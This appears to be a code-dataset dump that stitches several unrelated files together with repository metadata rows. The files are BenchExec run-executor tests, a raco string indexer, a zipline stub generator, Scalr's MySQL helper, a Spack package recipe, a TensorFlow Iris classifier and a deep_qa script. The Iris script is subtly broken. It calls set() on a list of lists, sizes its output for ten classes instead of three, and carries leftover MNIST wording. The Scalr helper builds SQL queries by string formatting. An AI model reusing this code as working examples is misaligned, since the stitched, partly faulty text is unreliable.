'echo "# An error report file with more information is saved as:";'
'echo "# $(pwd)/hs_err_pid_1234.txt";'
"echo TEST_TOKEN > hs_err_pid_1234.txt;"
"exit 2",
)
self.assertEqual(
output[-1], "TEST_TOKEN", "log file misses content from crash dump file"
)
def test_integration(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, output) = self.execute_run_extern("/bin/echo", "TEST_TOKEN")
self.check_exitcode_extern(result, 0, "exit code of /bin/echo is not zero")
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_home_and_tmp_is_separate(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
self.assertRegex(
output[-1],
"/BenchExec_run_[^/]*/home .*/BenchExec_run_[^/]*/tmp",
"HOME or TMPDIR variable does not contain expected temporary directory",
)
def test_temp_dirs_are_removed(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
home_dir = output[-1].split(" ")[0]
temp_dir = output[-1].split(" ")[1]
self.assertFalse(
os.path.exists(home_dir),
f"temporary home directory {home_dir} was not cleaned up",
)
self.assertFalse(
os.path.exists(temp_dir),
f"temporary temp directory {temp_dir} was not cleaned up",
)
def test_home_is_writable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "touch $HOME/TEST_FILE")
self.check_exitcode(
result,
0,
f"Failed to write to $HOME/TEST_FILE, output was\n{output}",
)
def test_no_cleanup_temp(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(cleanup_temp_dir=False) # create RunExecutor with desired parameter
(result, output) = self.execute_run(
"/bin/sh", "-c", 'echo "$TMPDIR"; echo "" > "$TMPDIR/test"'
)
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
temp_dir = output[-1]
test_file = os.path.join(temp_dir, "test")
subprocess.run(["test", "-f", test_file], check=True)
self.assertEqual(
"tmp", os.path.basename(temp_dir), "unexpected name of temp dir"
)
self.assertNotEqual(
"/tmp", temp_dir, "temp dir should not be the global temp dir"
)
subprocess.run(["rm", "-r", os.path.dirname(temp_dir)], check=True)
def test_require_cgroup_invalid(self):
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(SystemExit):
RunExecutor(additional_cgroup_subsystems=["invalid"])
self.assertIn(
'Cgroup subsystem "invalid" was required but is not available',
"\n".join(log.output),
)
def test_require_cgroup_cpu(self):
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", "/proc/self/cgroup")
self.check_exitcode(result, 0, "exit code of /bin/cat is not zero")
for line in output:
if re.match(r"^[0-9]*:([^:]*,)?cpu(,[^:]*)?:/(.*/)?benchmark_.*$", line):
return # Success
self.fail("Not in expected cgroup for subsystem cpu:\n" + "\n".join(output))
def test_set_cgroup_cpu_shares(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
(result, _) = self.execute_run(
"/bin/echo", cgroupValues={("cpu", "shares"): 42}
)
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
# Just assert that execution was successful,
# testing that the value was actually set is much more difficult.
def test_nested_runexec(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
self.setUp(
dir_modes={
# Do not mark /home hidden, would fail with python from virtualenv
"/": containerexecutor.DIR_READ_ONLY,
"/tmp": containerexecutor.DIR_FULL_ACCESS, # for inner_output_file
"/sys/fs/cgroup": containerexecutor.DIR_FULL_ACCESS,
}
)
inner_args = ["--", "/bin/echo", "TEST_TOKEN"]
with tempfile.NamedTemporaryFile(
mode="r", prefix="inner_output_", suffix=".log"
) as inner_output_file:
inner_cmdline = self.get_runexec_cmdline(
*inner_args, output_filename=inner_output_file.name
)
outer_result, outer_output = self.execute_run(*inner_cmdline)
inner_output = inner_output_file.read().strip().splitlines()
logging.info("Outer output:\n%s", "\n".join(outer_output))
logging.info("Inner output:\n%s", "\n".join(inner_output))
self.check_result_keys(outer_result, "returnvalue")
self.check_exitcode(outer_result, 0, "exit code of inner runexec is not zero")
self.check_command_in_output(inner_output, "/bin/echo TEST_TOKEN")
self.assertEqual(
inner_output[-1], "TEST_TOKEN", "run output misses command output"
)
def test_starttime(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
before = util.read_local_time()
(result, _) = self.execute_run("/bin/echo")
after = util.read_local_time()
self.check_result_keys(result)
run_starttime = result["starttime"]
self.assertIsNotNone(run_starttime.tzinfo, "start time is not a local time")
self.assertLessEqual(before, run_starttime)
self.assertLessEqual(run_starttime, after)
class TestRunExecutorWithContainer(TestRunExecutor):
def setUp(self, *args, **kwargs):
try:
container.execute_in_namespace(lambda: 0)
except OSError as e:
self.skipTest(f"Namespaces not supported: {os.strerror(e.errno)}")
dir_modes = kwargs.pop(
"dir_modes",
{
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
},
)
self.runexecutor = RunExecutor(
use_namespaces=True, dir_modes=dir_modes, *args, **kwargs
)
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--container",
"--read-only-dir",
"/",
"--hidden-dir",
"/home",
"--hidden-dir",
"/tmp",
"--dir",
"/tmp",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run(self, *args, **kwargs):
return super(TestRunExecutorWithContainer, self).execute_run(
workingDir="/tmp", *args, **kwargs
)
def test_home_and_tmp_is_separate(self):
self.skipTest("not relevant in container")
def test_temp_dirs_are_removed(self):
self.skipTest("not relevant in container")
def test_no_cleanup_temp(self):
self.skipTest("not relevant in container")
def check_result_files(
self, shell_cmd, result_files_patterns, expected_result_files
):
output_dir = tempfile.mkdtemp("", "output_")
try:
result, output = self.execute_run(
"/bin/sh",
"-c",
shell_cmd,
output_dir=output_dir,
result_files_patterns=result_files_patterns,
)
output_str = "\n".join(output)
self.assertEqual(
result["exitcode"].value,
0,
f"exit code of {' '.join(shell_cmd)} is not zero,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
result_files = []
for root, _unused_dirs, files in os.walk(output_dir):
for file in files:
result_files.append(
os.path.relpath(os.path.join(root, file), output_dir)
)
expected_result_files.sort()
result_files.sort()
self.assertListEqual(
result_files,
expected_result_files,
f"\nList of retrieved result files differs from expected list,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
finally:
shutil.rmtree(output_dir, ignore_errors=True)
def test_result_file_simple(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["."], ["TEST_FILE"])
def test_result_file_recursive(self):
self.check_result_files(
"mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["."],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; echo TEST_TOKEN > TEST_FILE2",
["."],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_symlink(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; ln -s TEST_FILE TEST_LINK",
["."],
["TEST_FILE"],
)
def test_result_file_no_match(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["NO_MATCH"], [])
def test_result_file_no_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", [], [])
def test_result_file_empty_pattern(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files("echo TEST_TOKEN > TEST_FILE", [""], []),
)
def test_result_file_partial_match(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_DIR"],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple_patterns(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"mkdir TEST_DIR; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE; ",
["TEST_FILE", "TEST_DIR/TEST_FILE"],
["TEST_FILE", "TEST_DIR/TEST_FILE"],
)
def test_result_file_wildcard(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"echo TEST_TOKEN > TEST_NOFILE; ",
["TEST_FILE*"],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_absolute_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["/"], ["tmp/TEST_FILE"])
def test_result_file_absolute_and_pattern(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_FILE", "/tmp/TEST_DIR"],
["tmp/TEST_FILE", "tmp/TEST_DIR/TEST_FILE"],
)
def test_result_file_relative_traversal(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../TEST_FILE"], ["TEST_FILE"]
)
def test_result_file_illegal_relative_traversal(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../../bar"], []
),
)
def test_result_file_recursive_pattern(self):
self.check_result_files(
"mkdir -p TEST_DIR/TEST_DIR; "
"echo TEST_TOKEN > TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_DIR/TEST_FILE.txt; ",
["**/*.txt"],
[
"TEST_FILE.txt",
"TEST_DIR/TEST_FILE.txt",
"TEST_DIR/TEST_DIR/TEST_FILE.txt",
],
)
def test_file_count_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 10000); do touch $i; done",
files_count_limit=100,
result_files_patterns=None,
expect_terminationreason="files-count",
)
self.check_exitcode(result, 9, "exit code of killed process is not 15")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_file_size_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 100000); do echo $i >> TEST_FILE; done",
files_size_limit=100,
result_files_patterns=None,
expect_terminationreason="files-size",
)
self.check_exitcode(result, 9, "exit code of killed process is not 15")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_path_with_space(self):
temp_dir = tempfile.mkdtemp(prefix="BenchExec test")
try:
# create RunExecutor with desired parameter
self.setUp(
dir_modes={
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
temp_dir: containerexecutor.DIR_FULL_ACCESS,
}
)
temp_file = os.path.join(temp_dir, "TEST_FILE")
result, output = self.execute_run(
"/bin/sh", "-c", f"echo TEST_TOKEN > '{temp_file}'"
)
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertTrue(
os.path.exists(temp_file),
f"File '{temp_file}' not created, output was:\n" + "\n".join(output),
)
with open(temp_file, "r") as f:
self.assertEqual(f.read().strip(), "TEST_TOKEN")
finally:
shutil.rmtree(temp_dir)
def test_uptime_with_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
self.assertLessEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly high in container"
)
def test_uptime_without_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
# create RunExecutor with desired parameter
self.setUp(container_system_config=False)
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
# If uptime was less than 10s, LXCFS probably was in use
self.assertGreaterEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly low in container"
)
class _StopRunThread(threading.Thread):
def __init__(self, delay, runexecutor):
super(_StopRunThread, self).__init__()
self.daemon = True
self.delay = delay
self.runexecutor = runexecutor
def run(self):
time.sleep(self.delay)
self.runexecutor.stop()
class TestRunExecutorUnits(unittest.TestCase):
"""unit tests for parts of RunExecutor"""
def test_get_debug_output_with_error_report_and_invalid_utf8(self):
invalid_utf8 = b"\xFF"
with tempfile.NamedTemporaryFile(mode="w+b", delete=False) as report_file:
with tempfile.NamedTemporaryFile(mode="w+b") as output:
output_content = f"""Dummy output
# An error report file with more information is saved as:
# {report_file.name}
More output
""".encode()
report_content = b"Report output\nMore lines"
output_content += invalid_utf8
report_content += invalid_utf8
output.write(output_content)
output.flush()
output.seek(0)
report_file.write(report_content)
report_file.flush()
runexecutor._get_debug_output_after_crash(output.name, "")
self.assertFalse(os.path.exists(report_file.name))
self.assertEqual(output.read(), output_content + report_content)
| apache-2.0 | 5,282,793,122,061,487,000 | 37.85045 | 105 | 0.555978 | false | 3.976395 | true | false | false |
uwescience/raco | c_test_environment/c_index_strings.py | 1 | 1244 | import csv
import sys
#TODO take a schema as input
class WordIndexer:
def __init__(self, indexf):
self.words = {}
self.count = 0
self.indexfw = open(indexf, 'w')
def add_word(self, w):
if w in self.words:
return self.words[w]
else:
self.indexfw.write(w+'\n')
t = self.count
self.count += 1
self.words[w] = t
return t
def close(self):
self.indexfw.close()
def indexing(inputf, delim_in):
intfile = inputf + '.i'
indexf = inputf + '.index'
delim_out = ' '
wi = WordIndexer(indexf)
with open(inputf, 'r') as ins:
reader = csv.reader(ins, delimiter=delim_in)
with open(intfile, 'w') as outs:
writer = csv.writer(outs, delimiter=delim_out)
for row in reader:
cols = [wi.add_word(w) for w in row]
writer.writerow(cols)
wi.close()
return intfile, indexf
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
if len(sys.argv) == 3:
delim = sys.argv[2]
else:
delim = ' '
indexing(sys.argv[1], delim_in=delim)
| bsd-3-clause | 9,030,464,873,541,193,000 | 20.824561 | 68 | 0.522508 | false | 3.398907 | false | false | false |
bartosh/zipline | etc/gen_type_stubs.py | 5 | 1635 | import inspect
from operator import attrgetter
from textwrap import dedent
from zipline import api, TradingAlgorithm
def main():
with open(api.__file__.rstrip('c') + 'i', 'w') as stub:
# Imports so that Asset et al can be resolved.
# "from MOD import *" will re-export the imports from the stub, so
# explicitly importing.
stub.write(dedent("""\
import collections
from zipline.assets import Asset, Equity, Future
from zipline.assets.futures import FutureChain
from zipline.finance.asset_restrictions import Restrictions
from zipline.finance.cancel_policy import CancelPolicy
from zipline.pipeline import Pipeline
from zipline.protocol import Order
from zipline.utils.events import EventRule
from zipline.utils.security_list import SecurityList
"""))
# Sort to generate consistent stub file:
for api_func in sorted(TradingAlgorithm.all_api_methods(),
key=attrgetter('__name__')):
sig = inspect._signature_bound_method(inspect.signature(api_func))
indent = ' ' * 4
stub.write(dedent('''\
def {func_name}{func_sig}:
"""'''.format(func_name=api_func.__name__,
func_sig=sig)))
stub.write(dedent('{indent}{func_doc}'.format(
func_doc=api_func.__doc__ or '\n', # handle None docstring
indent=indent,
)))
stub.write('{indent}"""\n\n'.format(indent=indent))
if __name__ == '__main__':
main()
| apache-2.0 | 6,159,726,706,091,059,000 | 35.333333 | 78 | 0.585933 | false | 4.455041 | false | false | false |
AlphaStaxLLC/scalr | app/python/scalrpy/util/dbmanager.py | 2 | 11297 | import time
import socket
import threading
import pymysql
import pymysql.err
import pymysql.cursors
from scalrpy.util import helper
from scalrpy import LOG
def make_connection(config, autocommit=True):
connection = pymysql.connect(
user=config['user'],
passwd=config['pass'],
db=config['name'],
host=config['host'],
port=config['port'],
cursorclass=pymysql.cursors.DictCursor,
connect_timeout=config.get('timeout', 10)
)
connection.autocommit(autocommit)
return connection
def validate_connection(connection):
try:
return connection.ping()
except:
try:
connection.close()
except:
pass
return False
class DB(object):
def __init__(self, config, pool_size=None):
self._local = threading.local()
def _make_connection():
return make_connection(config, autocommit=True)
def _validate_connection(connection):
return validate_connection(connection)
self._connection_pool = helper.Pool(
_make_connection,
_validate_connection,
pool_size if pool_size else config.get('pool_size', 4))
def autocommit(self, state):
if state and self._connection:
self._connection_pool.put(self._local.connection)
self._local.cursor.close()
self._local.cursor = None
self._local.connection = None
self._local.autocommit = bool(state)
@property
def _connection(self):
try:
return self._local.connection
except AttributeError:
self._local.connection = None
return self._local.connection
@property
def _autocommit(self):
try:
return self._local.autocommit
except AttributeError:
self._local.autocommit = True
return self._local.autocommit
def execute(self, query, retries=0, retry_timeout=10):
while True:
try:
if self._autocommit or not self._connection:
self._local.connection = self._connection_pool.get(timeout=10)
self._local.connection.autocommit(self._autocommit)
self._local.cursor = self._connection.cursor()
try:
start_time = time.time()
self._local.cursor.execute(query)
end_time = time.time()
if end_time - start_time > 1:
LOG.debug('Query too slow: %s\n%s...' %
(end_time - start_time, query[:150]))
results = self._local.cursor.fetchall()
if results is not None:
results = tuple(results)
return results
finally:
if self._autocommit:
self._local.cursor.close()
self._connection_pool.put(self._local.connection)
self._local.connection = None
self._local.cursor = None
except (pymysql.err.OperationalError, pymysql.err.InternalError, socket.timeout):
if not retries:
raise
retries -= 1
time.sleep(retry_timeout)
def execute_with_limit(self, query, limit, max_limit=None, retries=0, retry_timeout=10):
"""
:returns: generator
"""
if max_limit:
i, chunk_size = 0, min(limit, max_limit)
else:
i, chunk_size = 0, limit
while True:
is_last_iter = bool(max_limit) and (i + 1) * chunk_size > max_limit
if is_last_iter:
limit_query = query + \
" LIMIT %s, %s" % (i * chunk_size, max_limit - i * chunk_size)
else:
limit_query = query + " LIMIT %s, %s" % (i * chunk_size, chunk_size)
results = self.execute(limit_query, retries=retries, retry_timeout=retry_timeout)
if not results:
break
yield results
if len(results) < limit or is_last_iter:
break
i += 1
def commit(self):
if self._connection:
self._local.connection.commit()
self._local.cursor.close()
def rollback(self):
if self._connection:
self._connection.rollback()
class ScalrDB(DB):
def load_server_properties(self, servers, names):
names = list(names)
servers_id = list(set(server['server_id'] for server in servers if server['server_id']))
if not servers_id:
return
query = (
"SELECT server_id, name, value "
"FROM server_properties "
"WHERE name IN ({0}) "
"AND server_id IN ({1})"
).format(str(names)[1:-1], str(servers_id)[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['server_id'], {}).update({result['name']: result['value']})
for server in servers:
if server['server_id'] not in tmp:
continue
for k, v in tmp[server['server_id']].iteritems():
if k in server and server[k]:
continue
server[k] = v
return
def load_client_environment_properties(self, envs, names):
names = list(names)
envs_ids = list(set(env['id'] for env in envs if env['id'] or env['id'] == 0))
if not envs_ids:
return tuple()
query = (
"SELECT env_id, name, value "
"FROM client_environment_properties "
"WHERE name IN ({0}) "
"AND env_id IN ({1})"
).format(str(names)[1:-1], str(envs_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['env_id'], {}).update({result['name']: result['value']})
for env in envs:
if env['id'] not in tmp:
continue
for k, v in tmp[env['id']].iteritems():
if k in env and env[k]:
continue
env[k] = v
return
def load_farm_settings(self, farms, names):
names = list(names)
farms_ids = list(set(farm['id'] for farm in farms if farm['id'] or farm['id'] == 0))
if not farms_ids:
return dict()
query = (
"SELECT farmid farm_id, name, value "
"FROM farm_settings "
"WHERE name IN({0}) "
"AND farmid IN ({1})"
).format(str(names)[1:-1], str(farms_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_id'], {}).update({result['name']: result['value']})
for farm in farms:
if farm['id'] not in tmp:
continue
for k, v in tmp[farm['id']].iteritems():
if k in farm and farm[k]:
continue
farm[k] = v
return
def load_farm_role_settings(self, farms_roles, names):
names = list(names)
farms_roles_ids = list(set(_['id'] for _ in farms_roles if _['id'] or _['id'] == 0))
if not farms_roles_ids:
return dict()
query = (
"SELECT farm_roleid, name, value "
"FROM farm_role_settings "
"WHERE name IN ({0}) "
"AND farm_roleid IN ({1})"
).format(str(names)[1:-1], str(farms_roles_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_roleid'], {}).update({result['name']: result['value']})
for farm_role in farms_roles:
if farm_role['id'] not in tmp:
continue
for k, v in tmp[farm_role['id']].iteritems():
if k in farm_role and farm_role[k]:
continue
farm_role[k] = v
return
def load_vpc_settings(self, servers):
# ec2.vpc.id
farms_id = list(set([_['farm_id'] for _ in servers if _['farm_id'] or _['farm_id'] == 0]))
if not farms_id:
return
query = (
"SELECT farmid, value "
"FROM farm_settings "
"WHERE name = 'ec2.vpc.id' "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['value']
for server in servers:
if server['farm_id'] not in tmp:
continue
server['ec2.vpc.id'] = tmp[server['farm_id']]
# router_role_id
farms_role_id = list(set([_['farm_roleid'] for _ in servers if 'ec2.vpc.id' in _]))
if not farms_role_id:
return
# get router role id from farm_role_settings
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.scalr.farm_role_id' "
"AND farm_roleid IN ({0}) "
).format(str(farms_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = int(result['value'])
for server in servers:
if server['farm_roleid'] not in tmp:
continue
# router.scalr.farm_role_id has int type
server['router_role_id'] = int(tmp[server['farm_roleid']])
# get router role id from farm_roles
query = (
"SELECT id router_role_id, farmid "
"FROM farm_roles "
"WHERE role_id IN "
"(SELECT role_id FROM role_behaviors WHERE behavior='router') "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['router_role_id']
for server in servers:
if 'router_role_id' not in server and server['farm_id'] in tmp:
server['router_role_id'] = tmp[server['farm_id']]
# router_vpc_ip
routers_role_id = list(set(_['router_role_id']
for _ in servers if 'ec2.vpc.id' in _ and 'router_role_id' in _))
if not routers_role_id:
return
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.vpc.ip' "
"AND farm_roleid IN ({0})"
).format(str(routers_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = result['value']
for server in servers:
if 'router_role_id' in server and server['router_role_id'] in tmp:
server['router.vpc.ip'] = tmp[server['router_role_id']]
return
| apache-2.0 | -2,952,279,632,889,608,000 | 34.637224 | 100 | 0.512348 | false | 3.979218 | true | false | false |
iulian787/spack | var/spack/repos/builtin/packages/diffutils/package.py | 2 | 1246 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack import *
class Diffutils(AutotoolsPackage, GNUMirrorPackage):
"""GNU Diffutils is a package of several programs related to finding
differences between files."""
executables = [r'^diff$']
homepage = "https://www.gnu.org/software/diffutils/"
gnu_mirror_path = "diffutils/diffutils-3.7.tar.xz"
version('3.7', sha256='b3a7a6221c3dc916085f0d205abf6b8e1ba443d4dd965118da364a1dc1cb3a26')
version('3.6', sha256='d621e8bdd4b573918c8145f7ae61817d1be9deb4c8d2328a65cea8e11d783bd6')
build_directory = 'spack-build'
patch('nvhpc.patch', when='@3.7 %nvhpc')
depends_on('iconv')
def setup_build_environment(self, env):
if self.spec.satisfies('%fj'):
env.append_flags('CFLAGS',
'-Qunused-arguments')
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(r'diff \(GNU diffutils\) (\S+)', output)
return match.group(1) if match else None
| lgpl-2.1 | -8,120,714,615,899,992,000 | 31.789474 | 93 | 0.683788 | false | 3.162437 | false | false | false |
theoryclub/tf_workshop | Iris.py | 1 | 4006 | import tensorflow as tf
import numpy as np
import struct
import math
import os
path=os.path.dirname(os.path.realpath(__file__))
def normalize(v):
norm=np.linalg.norm(v)
if norm==0:
return v
return v/norm
def readToLines(file):
csvFile=open(file)
lines=csvFile.read().splitlines()
csvFile.close()
splitLines=[]
for line in lines:
splitLines+=[line.split(',')]
return splitLines
FEATURES=4
NUM_CLASSES=3
hidden1_num_neurons=2 #neurons in first layer
output_num_neurons=NUM_CLASSES #neurons in second (output) layer. Each neuron corresponds to a digit. The classification is the order of the
#output neuron with the highest activation
#function to read MNIST images and labels into numpy matrices
def loadData(file):
splitLines=readToLines(file)
global FEATURES
vocab = list(set(splitLines))
features=np.zeros([len(splitLines)-1, FEATURES])
labels=np.zeros([len(splitLines)-1, NUM_CLASSES])
for dataInd in range(0, len(splitLines)):
splitLine=splitLines[dataInd]
features[dataInd, :]=splitLine[:4]
labels[dataInd, int(splitLine[4])]=1.0
for ind in range(0, len(features[0])):
features[:, ind]=normalize(features[:, ind])
return features[0:int(3*(len(splitLines)-1)/4)], labels[0:int(3*(len(splitLines)-1)/4)], features[int(3*(len(splitLines)-1)/4):], labels[int(3*(len(splitLines)-1)/4):]
def getClassificationAccuracy(networkOutputs, trueLabels):
numberCorrect=0.0
for labelInd in range(0, len(trueLabels)):
if trueLabels[labelInd][np.argmax(networkOutputs[labelInd], 0)]==1:
numberCorrect=numberCorrect+1
print('Classification Accuracy: '+str(100*(numberCorrect/len(trueLabels)))+'%')
print('Training a neural network on the MNIST Handwriting Classification Problem')
inputs = tf.placeholder(tf.float32, ([None, FEATURES])) #inputs placeholder
trueOutput = tf.placeholder(tf.float32, ([None, NUM_CLASSES])) #correct image label placeholder
#first layer weights and biases
weights1 = tf.Variable(tf.random_normal([FEATURES, hidden1_num_neurons]))
biases1 = tf.Variable(tf.zeros([hidden1_num_neurons]))
hidden1 = tf.nn.sigmoid(tf.matmul(inputs, weights1) + biases1)
#second layer weights and biases
weights2 = tf.Variable(tf.random_normal([hidden1_num_neurons, output_num_neurons]))
biases2 = tf.Variable(tf.zeros([output_num_neurons]))
output = tf.nn.softmax(tf.matmul(hidden1, weights2) + biases2)
#loss function: mean squared error
loss=tf.reduce_mean(tf.square(tf.subtract(output, trueOutput)))
#specify optimization operation ('train op')
optimizer = tf.train.AdamOptimizer()
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
#read MNIST images and tabels
trainImages, trainLabels, valImages, valLabels=loadData('./data/Iris.csv')
#train neural network
BATCH_SIZE=2500;
with tf.Session() as session:
tf.initialize_all_variables().run()
#train for 100 optimization steps (on all 60,000 inputs)
for i in range(0, 40):
shuffle=np.random.permutation(len(trainImages))
sessLoss=0.0
sessOutput=np.zeros([len(trainImages), 10])
for batchInd in range(0, len(trainImages), BATCH_SIZE):
_, batchLoss, batchOutput=session.run([train_op, loss, output], feed_dict={inputs: trainImages[shuffle[batchInd:batchInd+BATCH_SIZE]],
trueOutput: trainLabels[shuffle[batchInd:batchInd+BATCH_SIZE]]})
sessLoss+=batchLoss
sessOutput[batchInd:batchInd+BATCH_SIZE]=batchOutput
print('Epoch '+str(i)+' train loss', sessLoss)
getClassificationAccuracy(sessOutput, trainLabels)
print()
sessLoss, sessOutput=session.run([loss, output], feed_dict={inputs: valImages, trueOutput: valLabels})
print('test loss', sessLoss)
getClassificationAccuracy(sessOutput, valLabels)
| mit | -7,951,701,745,459,195,000 | 38.27451 | 171 | 0.696455 | false | 3.51712 | false | false | false |
RTHMaK/RPGOne | deep_qa-master/scripts/get_nearest_neighbors.py | 1 | 2100 | import argparse
import codecs
import logging
from pyhocon import ConfigFactory
from deep_qa.common.checks import ensure_pythonhashseed_set
from deep_qa.data.instances.instance import TextInstance
from deep_qa.models.memory_networks.differentiable_search import DifferentiableSearchMemoryNetwork
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def main():
"""
This script loads a DifferentiableSearchSolver model, encodes a corpus and the sentences in a
given file, and finds nearest neighbors in the corpus for all of the sentences in the file,
using the trained sentence encoder.
"""
argparser = argparse.ArgumentParser(description="Neural Network Solver")
argparser.add_argument('--param_file', type=str, required=True,
help='Path to file containing solver parameters')
argparser.add_argument('--sentence_file', type=str, required=True,
help='Path to sentence file, for which we will find nearest neighbors')
argparser.add_argument('--output_file', type=str, required=True,
help='Place to save results of nearest neighbor search')
args = argparser.parse_args()
param_file = args.param_file
params = ConfigFactory.parse_file(param_file)
solver = DifferentiableSearchMemoryNetwork(**params) # TODO(matt): fix this in the next PR
solver.load_model()
with codecs.open(args.output_file, 'w', 'utf-8') as outfile:
for line in codecs.open(args.sentence_file, 'r', 'utf-8').readlines():
outfile.write(line)
instance = TextInstance(line.strip(), True)
neighbors = solver.get_nearest_neighbors(instance)
for neighbor in neighbors:
outfile.write('\t')
outfile.write(neighbor.text)
outfile.write('\n')
